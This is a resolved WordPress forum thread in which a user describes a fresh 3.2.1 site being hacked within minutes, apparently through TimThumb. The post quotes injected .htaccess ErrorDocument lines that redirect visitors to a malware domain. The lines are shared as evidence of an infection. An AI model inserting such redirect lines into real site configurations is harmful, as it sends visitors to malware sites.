[Resolved] TimThumb Hack (was WordPress 3.2.1 vanilla is FAR from secure…)
Been using WP for about a year now, loving it.
Today though, has been a nightmare. Got a new domain on a hot topic, installed newest version of WP (3.2.1) and it got hacked within minutes. I had NO plugins, NO special themes.
Got attacked by some malware URLs:
ErrorDocument 400 generation-internet.ru/pcollection/index.php
ErrorDocument 401 generation-internet.ru/pcollection/index.php
ErrorDocument 403 generation-internet.ru/pcollection/index.php
ErrorDocument 404 generation-internet.ru/pcollection/index.php
[Mod. – Delinked to not make them clickable. Let us not help the spammers.]
Pretty ridiculous, and very frustrating.
I’d like to know how this got in my htaccess file exactly… Working with my VPS hosting company but it’s not going anywhere.
I’ve re-installed it several times, I’ve even installed the Secure WordPress plugin, and still infected.
- The topic ‘[Resolved] TimThumb Hack (was WordPress 3.2.1 vanilla is FAR from secure…)’ is closed to new replies.